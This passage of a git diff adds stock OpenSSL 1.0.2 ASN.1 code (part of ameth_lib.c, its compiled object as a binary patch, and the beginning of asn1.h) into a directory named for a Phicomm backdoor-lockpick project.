+    if (info) {
+        ameth->info = BUF_strdup(info);
+        if (!ameth->info)
+            goto err;
+    } else
+        ameth->info = NULL;
+
+    if (pem_str) {
+        ameth->pem_str = BUF_strdup(pem_str);
+        if (!ameth->pem_str)
+            goto err;
+    } else
+        ameth->pem_str = NULL;
+
+    ameth->pub_decode = 0;
+    ameth->pub_encode = 0;
+    ameth->pub_cmp = 0;
+    ameth->pub_print = 0;
+
+    ameth->priv_decode = 0;
+    ameth->priv_encode = 0;
+    ameth->priv_print = 0;
+
+    ameth->old_priv_encode = 0;
+    ameth->old_priv_decode = 0;
+
+    ameth->item_verify = 0;
+    ameth->item_sign = 0;
+
+    ameth->pkey_size = 0;
+    ameth->pkey_bits = 0;
+
+    ameth->param_decode = 0;
+    ameth->param_encode = 0;
+    ameth->param_missing = 0;
+    ameth->param_copy = 0;
+    ameth->param_cmp = 0;
+    ameth->param_print = 0;
+
+    ameth->pkey_free = 0;
+    ameth->pkey_ctrl = 0;
+
+    return ameth;
+
+ err:
+
+    EVP_PKEY_asn1_free(ameth);
+    return NULL;
+
+}
+
+void EVP_PKEY_asn1_copy(EVP_PKEY_ASN1_METHOD *dst,
+                        const EVP_PKEY_ASN1_METHOD *src)
+{
+
+    dst->pub_decode = src->pub_decode;
+    dst->pub_encode = src->pub_encode;
+    dst->pub_cmp = src->pub_cmp;
+    dst->pub_print = src->pub_print;
+
+    dst->priv_decode = src->priv_decode;
+    dst->priv_encode = src->priv_encode;
+    dst->priv_print = src->priv_print;
+
+    dst->old_priv_encode = src->old_priv_encode;
+    dst->old_priv_decode = src->old_priv_decode;
+
+    dst->pkey_size = src->pkey_size;
+    dst->pkey_bits = src->pkey_bits;
+
+    dst->param_decode = src->param_decode;
+    dst->param_encode = src->param_encode;
+    dst->param_missing = src->param_missing;
+    dst->param_copy = src->param_copy;
+    dst->param_cmp = src->param_cmp;
+    dst->param_print = src->param_print;
+
+    dst->pkey_free = src->pkey_free;
+    dst->pkey_ctrl = src->pkey_ctrl;
+
+    dst->item_sign = src->item_sign;
+    dst->item_verify = src->item_verify;
+
+}
+
+void EVP_PKEY_asn1_free(EVP_PKEY_ASN1_METHOD *ameth)
+{
+    if (ameth && (ameth->pkey_flags & ASN1_PKEY_DYNAMIC)) {
+        if (ameth->pem_str)
+            OPENSSL_free(ameth->pem_str);
+        if (ameth->info)
+            OPENSSL_free(ameth->info);
+        OPENSSL_free(ameth);
+    }
+}
+
+void EVP_PKEY_asn1_set_public(EVP_PKEY_ASN1_METHOD *ameth,
+                              int (*pub_decode) (EVP_PKEY *pk,
+                                                 X509_PUBKEY *pub),
+                              int (*pub_encode) (X509_PUBKEY *pub,
+                                                 const EVP_PKEY *pk),
+                              int (*pub_cmp) (const EVP_PKEY *a,
+                                              const EVP_PKEY *b),
+                              int (*pub_print) (BIO *out,
+                                                const EVP_PKEY *pkey,
+                                                int indent, ASN1_PCTX *pctx),
+                              int (*pkey_size) (const EVP_PKEY *pk),
+                              int (*pkey_bits) (const EVP_PKEY *pk))
+{
+    ameth->pub_decode = pub_decode;
+    ameth->pub_encode = pub_encode;
+    ameth->pub_cmp = pub_cmp;
+    ameth->pub_print = pub_print;
+    ameth->pkey_size = pkey_size;
+    ameth->pkey_bits = pkey_bits;
+}
+
+void EVP_PKEY_asn1_set_private(EVP_PKEY_ASN1_METHOD *ameth,
+                               int (*priv_decode) (EVP_PKEY *pk,
+                                                   PKCS8_PRIV_KEY_INFO
+                                                   *p8inf),
+                               int (*priv_encode) (PKCS8_PRIV_KEY_INFO *p8,
+                                                   const EVP_PKEY *pk),
+                               int (*priv_print) (BIO *out,
+                                                  const EVP_PKEY *pkey,
+                                                  int indent,
+                                                  ASN1_PCTX *pctx))
+{
+    ameth->priv_decode = priv_decode;
+    ameth->priv_encode = priv_encode;
+    ameth->priv_print = priv_print;
+}
+
+void EVP_PKEY_asn1_set_param(EVP_PKEY_ASN1_METHOD *ameth,
+                             int (*param_decode) (EVP_PKEY *pkey,
+                                                  const unsigned char **pder,
+                                                  int derlen),
+                             int (*param_encode) (const EVP_PKEY *pkey,
+                                                  unsigned char **pder),
+                             int (*param_missing) (const EVP_PKEY *pk),
+                             int (*param_copy) (EVP_PKEY *to,
+                                                const EVP_PKEY *from),
+                             int (*param_cmp) (const EVP_PKEY *a,
+                                               const EVP_PKEY *b),
+                             int (*param_print) (BIO *out,
+                                                 const EVP_PKEY *pkey,
+                                                 int indent, ASN1_PCTX *pctx))
+{
+    ameth->param_decode = param_decode;
+    ameth->param_encode = param_encode;
+    ameth->param_missing = param_missing;
+    ameth->param_copy = param_copy;
+    ameth->param_cmp = param_cmp;
+    ameth->param_print = param_print;
+}
+
+void EVP_PKEY_asn1_set_free(EVP_PKEY_ASN1_METHOD *ameth,
+                            void (*pkey_free) (EVP_PKEY *pkey))
+{
+    ameth->pkey_free = pkey_free;
+}
+
+void EVP_PKEY_asn1_set_ctrl(EVP_PKEY_ASN1_METHOD *ameth,
+                            int (*pkey_ctrl) (EVP_PKEY *pkey, int op,
+                                              long arg1, void *arg2))
+{
+    ameth->pkey_ctrl = pkey_ctrl;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/ameth_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/ameth_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..239c8eb74941efefde958d8ff6049a61a546879a
GIT binary patch
literal 6888
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1.h
new file mode 100644
index 0000000..bb6ac95
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1.h
@@ -0,0 +1,1418 @@
+/* crypto/asn1/asn1.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_ASN1_H
+# define HEADER_ASN1_H
+
+# include <time.h>
+# include <openssl/e_os2.h>
+# ifndef OPENSSL_NO_BIO
+#  include <openssl/bio.h>
+# endif
+# include <openssl/stack.h>
+# include <openssl/safestack.h>
+
+# include <openssl/symhacks.h>
+
+# include <openssl/ossl_typ.h>
+# ifndef OPENSSL_NO_DEPRECATED
+#  include <openssl/bn.h>
+# endif
+
+# ifdef OPENSSL_BUILD_SHLIBCRYPTO
+#  undef OPENSSL_EXTERN
+#  define OPENSSL_EXTERN OPENSSL_EXPORT
+# endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# define V_ASN1_UNIVERSAL                0x00
+# define V_ASN1_APPLICATION              0x40
+# define V_ASN1_CONTEXT_SPECIFIC         0x80
+# define V_ASN1_PRIVATE                  0xc0
+
+# define V_ASN1_CONSTRUCTED              0x20
+# define V_ASN1_PRIMITIVE_TAG            0x1f
+# define V_ASN1_PRIMATIVE_TAG            0x1f
+
+# define V_ASN1_APP_CHOOSE               -2/* let the recipient choose */
+# define V_ASN1_OTHER                    -3/* used in ASN1_TYPE */
+# define V_ASN1_ANY                      -4/* used in ASN1 template code */
+
+# define V_ASN1_NEG                      0x100/* negative flag */
+
+# define V_ASN1_UNDEF                    -1
+# define V_ASN1_EOC                      0
+# define V_ASN1_BOOLEAN                  1 /**/
+# define V_ASN1_INTEGER                  2
+# define V_ASN1_NEG_INTEGER              (2 | V_ASN1_NEG)
+# define V_ASN1_BIT_STRING               3
+# define V_ASN1_OCTET_STRING             4
+# define V_ASN1_NULL                     5
+# define V_ASN1_OBJECT                   6
+# define V_ASN1_OBJECT_DESCRIPTOR        7
+# define V_ASN1_EXTERNAL                 8
+# define V_ASN1_REAL                     9
+# define V_ASN1_ENUMERATED               10
+# define V_ASN1_NEG_ENUMERATED           (10 | V_ASN1_NEG)
+# define V_ASN1_UTF8STRING               12
+# define V_ASN1_SEQUENCE                 16
+# define V_ASN1_SET                      17
+# define V_ASN1_NUMERICSTRING            18 /**/
+# define V_ASN1_PRINTABLESTRING          19
+# define V_ASN1_T61STRING                20
+# define V_ASN1_TELETEXSTRING            20/* alias */
+# define V_ASN1_VIDEOTEXSTRING           21 /**/
+# define V_ASN1_IA5STRING                22
+# define V_ASN1_UTCTIME                  23
+# define V_ASN1_GENERALIZEDTIME          24 /**/
+# define V_ASN1_GRAPHICSTRING            25 /**/
+# define V_ASN1_ISO64STRING              26 /**/
+# define V_ASN1_VISIBLESTRING            26/* alias */
+# define V_ASN1_GENERALSTRING            27 /**/
+# define V_ASN1_UNIVERSALSTRING          28 /**/
+# define V_ASN1_BMPSTRING                30
+/* For use with d2i_ASN1_type_bytes() */
+# define B_ASN1_NUMERICSTRING    0x0001
+# define B_ASN1_PRINTABLESTRING  0x0002
+# define B_ASN1_T61STRING        0x0004
+# define B_ASN1_TELETEXSTRING    0x0004
+# define B_ASN1_VIDEOTEXSTRING   0x0008
+# define B_ASN1_IA5STRING        0x0010
+# define B_ASN1_GRAPHICSTRING    0x0020
+# define B_ASN1_ISO64STRING      0x0040
+# define B_ASN1_VISIBLESTRING    0x0040
+# define B_ASN1_GENERALSTRING    0x0080
+# define B_ASN1_UNIVERSALSTRING  0x0100
+# define B_ASN1_OCTET_STRING     0x0200
+# define B_ASN1_BIT_STRING       0x0400
+# define B_ASN1_BMPSTRING        0x0800
+# define B_ASN1_UNKNOWN          0x1000
+# define B_ASN1_UTF8STRING       0x2000
+# define B_ASN1_UTCTIME          0x4000
+# define B_ASN1_GENERALIZEDTIME  0x8000
+# define B_ASN1_SEQUENCE         0x10000
+/* For use with ASN1_mbstring_copy() */
+# define MBSTRING_FLAG           0x1000
+# define MBSTRING_UTF8           (MBSTRING_FLAG)
+# define MBSTRING_ASC            (MBSTRING_FLAG|1)
+# define MBSTRING_BMP            (MBSTRING_FLAG|2)
+# define MBSTRING_UNIV           (MBSTRING_FLAG|4)
+# define SMIME_OLDMIME           0x400
+# define SMIME_CRLFEOL           0x800
+# define SMIME_STREAM            0x1000
+    struct X509_algor_st;
+DECLARE_STACK_OF(X509_ALGOR)
+
+# define DECLARE_ASN1_SET_OF(type)/* filled in by mkstack.pl */
+# define IMPLEMENT_ASN1_SET_OF(type)/* nothing, no longer needed */
+
+/*
+ * We MUST make sure that, except for constness, asn1_ctx_st and
+ * asn1_const_ctx are exactly the same.  Fortunately, as soon as the old ASN1
+ * parsing macros are gone, we can throw this away as well...
+ */
+typedef struct asn1_ctx_st {
+    unsigned char *p;           /* work char pointer */
+    int eos;                    /* end of sequence read for indefinite
+                                 * encoding */
+    int error;                  /* error code to use when returning an error */
+    int inf;                    /* constructed if 0x20, indefinite is 0x21 */
+    int tag;                    /* tag from last 'get object' */
+    int xclass;                 /* class from last 'get object' */
+    long slen;                  /* length of last 'get object' */
+    unsigned char *max;         /* largest value of p allowed */
+    unsigned char *q;           /* temporary variable */
+    unsigned char **pp;         /* variable */
+    int line;                   /* used in error processing */
+} ASN1_CTX;
+
+typedef struct asn1_const_ctx_st {
+    const unsigned char *p;     /* work char pointer */
+    int eos;                    /* end of sequence read for indefinite
+                                 * encoding */
+    int error;                  /* error code to use when returning an error */
+    int inf;                    /* constructed if 0x20, indefinite is 0x21 */
+    int tag;                    /* tag from last 'get object' */
+    int xclass;                 /* class from last 'get object' */
+    long slen;                  /* length of last 'get object' */
+    const unsigned char *max;   /* largest value of p allowed */
+    const unsigned char *q;     /* temporary variable */
+    const unsigned char **pp;   /* variable */
+    int line;                   /* used in error processing */
+} ASN1_const_CTX;
+
+/*
+ * These are used internally in the ASN1_OBJECT to keep track of whether the
+ * names and data need to be free()ed
+ */
+# define ASN1_OBJECT_FLAG_DYNAMIC         0x01/* internal use */
+# define ASN1_OBJECT_FLAG_CRITICAL        0x02/* critical x509v3 object id */
+# define ASN1_OBJECT_FLAG_DYNAMIC_STRINGS 0x04/* internal use */
+# define ASN1_OBJECT_FLAG_DYNAMIC_DATA    0x08/* internal use */
+struct asn1_object_st {
+    const char *sn, *ln;
+    int nid;
+    int length;
+    const unsigned char *data;  /* data remains const after init */
+    int flags;                  /* Should we free this one */
+};
+
+# define ASN1_STRING_FLAG_BITS_LEFT 0x08/* Set if 0x07 has bits left value */
+/*
+ * This indicates that the ASN1_STRING is not a real value but just a place
+ * holder for the location where indefinite length constructed data should be
+ * inserted in the memory buffer
+ */
+# define ASN1_STRING_FLAG_NDEF 0x010
+
+/*
+ * This flag is used by the CMS code to indicate that a string is not
+ * complete and is a place holder for content when it had all been accessed.
+ * The flag will be reset when content has been written to it.
+ */
+
+# define ASN1_STRING_FLAG_CONT 0x020
+/*
+ * This flag is used by ASN1 code to indicate an ASN1_STRING is an MSTRING
+ * type.
+ */
+# define ASN1_STRING_FLAG_MSTRING 0x040
+/* This is the base type that holds just about everything :-) */
+struct asn1_string_st {
+    int length;
+    int type;
+    unsigned char *data;
+    /*
+     * The value of the following field depends on the type being held.  It
+     * is mostly being used for BIT_STRING so if the input data has a
+     * non-zero 'unused bits' value, it will be handled correctly
+     */
+    long flags;
+};
+
+/*
+ * ASN1_ENCODING structure: this is used to save the received encoding of an
+ * ASN1 type. This is useful to get round problems with invalid encodings
+ * which can break signatures.
+ */
+
+typedef struct ASN1_ENCODING_st {
+    unsigned char *enc;         /* DER encoding */
+    long len;                   /* Length of encoding */
+    int modified;               /* set to 1 if 'enc' is invalid */
+} ASN1_ENCODING;
+
+/* Used with ASN1 LONG type: if a long is set to this it is omitted */
+# define ASN1_LONG_UNDEF 0x7fffffffL
+
+# define STABLE_FLAGS_MALLOC     0x01
+# define STABLE_NO_MASK          0x02
+# define DIRSTRING_TYPE  \
+ (B_ASN1_PRINTABLESTRING|B_ASN1_T61STRING|B_ASN1_BMPSTRING|B_ASN1_UTF8STRING)
+# define PKCS9STRING_TYPE (DIRSTRING_TYPE|B_ASN1_IA5STRING)
+
+typedef struct asn1_string_table_st {
+    int nid;
+    long minsize;
+    long maxsize;
+    unsigned long mask;
+    unsigned long flags;
+} ASN1_STRING_TABLE;
+
+DECLARE_STACK_OF(ASN1_STRING_TABLE)
+
+/* size limits: this stuff is taken straight from RFC2459 */
+
+# define ub_name                         32768
+# define ub_common_name                  64
+# define ub_locality_name                128
+# define ub_state_name                   128
+# define ub_organization_name            64
+# define ub_organization_unit_name       64
+# define ub_title                        64
+# define ub_email_address                128
+
+/*
+ * Declarations for template structures: for full definitions see asn1t.h
+ */
+typedef struct ASN1_TEMPLATE_st ASN1_TEMPLATE;
+typedef struct ASN1_TLC_st ASN1_TLC;
+/* This is just an opaque pointer */
+typedef struct ASN1_VALUE_st ASN1_VALUE;
+
+/* Declare ASN1 functions: the implement macro in in asn1t.h */
+
+# define DECLARE_ASN1_FUNCTIONS(type) DECLARE_ASN1_FUNCTIONS_name(type, type)
+
+# define DECLARE_ASN1_ALLOC_FUNCTIONS(type) \
+        DECLARE_ASN1_ALLOC_FUNCTIONS_name(type, type)
+
+# define DECLARE_ASN1_FUNCTIONS_name(type, name) \
+        DECLARE_ASN1_ALLOC_FUNCTIONS_name(type, name) \
+        DECLARE_ASN1_ENCODE_FUNCTIONS(type, name, name)
+
+# define DECLARE_ASN1_FUNCTIONS_fname(type, itname, name) \
+        DECLARE_ASN1_ALLOC_FUNCTIONS_name(type, name) \
+        DECLARE_ASN1_ENCODE_FUNCTIONS(type, itname, name)
+
+# define DECLARE_ASN1_ENCODE_FUNCTIONS(type, itname, name) \
+        type *d2i_##name(type **a, const unsigned char **in, long len); \
+        int i2d_##name(type *a, unsigned char **out); \
+        DECLARE_ASN1_ITEM(itname)
+
+# define DECLARE_ASN1_ENCODE_FUNCTIONS_const(type, name) \
+        type *d2i_##name(type **a, const unsigned char **in, long len); \
+        int i2d_##name(const type *a, unsigned char **out); \
+        DECLARE_ASN1_ITEM(name)
+
+# define DECLARE_ASN1_NDEF_FUNCTION(name) \
+        int i2d_##name##_NDEF(name *a, unsigned char **out);
+
+# define DECLARE_ASN1_FUNCTIONS_const(name) \
+        DECLARE_ASN1_ALLOC_FUNCTIONS(name) \
+        DECLARE_ASN1_ENCODE_FUNCTIONS_const(name, name)
+
+# define DECLARE_ASN1_ALLOC_FUNCTIONS_name(type, name) \
+        type *name##_new(void); \
+        void name##_free(type *a);
+
+# define DECLARE_ASN1_PRINT_FUNCTION(stname) \
+        DECLARE_ASN1_PRINT_FUNCTION_fname(stname, stname)
+
+# define DECLARE_ASN1_PRINT_FUNCTION_fname(stname, fname) \
+        int fname##_print_ctx(BIO *out, stname *x, int indent, \
+                                         const ASN1_PCTX *pctx);
+
+# define D2I_OF(type) type *(*)(type **,const unsigned char **,long)
+# define I2D_OF(type) int (*)(type *,unsigned char **)
+# define I2D_OF_const(type) int (*)(const type *,unsigned char **)
+
+# define CHECKED_D2I_OF(type, d2i) \
+    ((d2i_of_void*) (1 ? d2i : ((D2I_OF(type))0)))
+# define CHECKED_I2D_OF(type, i2d) \
+    ((i2d_of_void*) (1 ? i2d : ((I2D_OF(type))0)))
+# define CHECKED_NEW_OF(type, xnew) \
+    ((void *(*)(void)) (1 ? xnew : ((type *(*)(void))0)))
+# define CHECKED_PTR_OF(type, p) \
+    ((void*) (1 ? p : (type*)0))
+# define CHECKED_PPTR_OF(type, p) \
+    ((void**) (1 ? p : (type**)0))
+
+# define TYPEDEF_D2I_OF(type) typedef type *d2i_of_##type(type **,const unsigned char **,long)
+# define TYPEDEF_I2D_OF(type) typedef int i2d_of_##type(type *,unsigned char **)
+# define TYPEDEF_D2I2D_OF(type) TYPEDEF_D2I_OF(type); TYPEDEF_I2D_OF(type)
+
+TYPEDEF_D2I2D_OF(void);
+
+/*-
+ * The following macros and typedefs allow an ASN1_ITEM
+ * to be embedded in a structure and referenced. Since
+ * the ASN1_ITEM pointers need to be globally accessible
+ * (possibly from shared libraries) they may exist in
+ * different forms. On platforms that support it the
+ * ASN1_ITEM structure itself will be globally exported.
+ * Other platforms will export a function that returns
+ * an ASN1_ITEM pointer.
+ *
+ * To handle both cases transparently the macros below
+ * should be used instead of hard coding an ASN1_ITEM
+ * pointer in a structure.
+ *
+ * The structure will look like this:
+ *
+ * typedef struct SOMETHING_st {
+ *      ...
+ *      ASN1_ITEM_EXP *iptr;
+ *      ...
+ * } SOMETHING;
+ *
+ * It would be initialised as e.g.:
+ *
+ * SOMETHING somevar = {...,ASN1_ITEM_ref(X509),...};
+ *
+ * and the actual pointer extracted with:
+ *
+ * const ASN1_ITEM *it = ASN1_ITEM_ptr(somevar.iptr);
+ *
+ * Finally an ASN1_ITEM pointer can be extracted from an
+ * appropriate reference with: ASN1_ITEM_rptr(X509). This
+ * would be used when a function takes an ASN1_ITEM * argument.
+ *
+ */
+
+# ifndef OPENSSL_EXPORT_VAR_AS_FUNCTION
+
+/* ASN1_ITEM pointer exported type */
+typedef const ASN1_ITEM ASN1_ITEM_EXP;
+
+/* Macro to obtain ASN1_ITEM pointer from exported type */
+#  define ASN1_ITEM_ptr(iptr) (iptr)
+
+/* Macro to include ASN1_ITEM pointer from base type */
+#  define ASN1_ITEM_ref(iptr) (&(iptr##_it))
+
+#  define ASN1_ITEM_rptr(ref) (&(ref##_it))
+
+#  define DECLARE_ASN1_ITEM(name) \
+        OPENSSL_EXTERN const ASN1_ITEM name##_it;
+
+# else
+
+/*
+ * Platforms that can't easily handle shared global variables are declared as
+ * functions returning ASN1_ITEM pointers.
+ */
+
+/* ASN1_ITEM pointer exported type */
+typedef const ASN1_ITEM *ASN1_ITEM_EXP (void);
+
+/* Macro to obtain ASN1_ITEM pointer from exported type */
+#  define ASN1_ITEM_ptr(iptr) (iptr())
+
+/* Macro to include ASN1_ITEM pointer from base type */
+#  define ASN1_ITEM_ref(iptr) (iptr##_it)
+
+#  define ASN1_ITEM_rptr(ref) (ref##_it())
+
+#  define DECLARE_ASN1_ITEM(name) \
+        const ASN1_ITEM * name##_it(void);
+
+# endif
+
+/* Parameters used by ASN1_STRING_print_ex() */
+
+/*
+ * These determine which characters to escape: RFC2253 special characters,
+ * control characters and MSB set characters
+ */
+
+# define ASN1_STRFLGS_ESC_2253           1
+# define ASN1_STRFLGS_ESC_CTRL           2
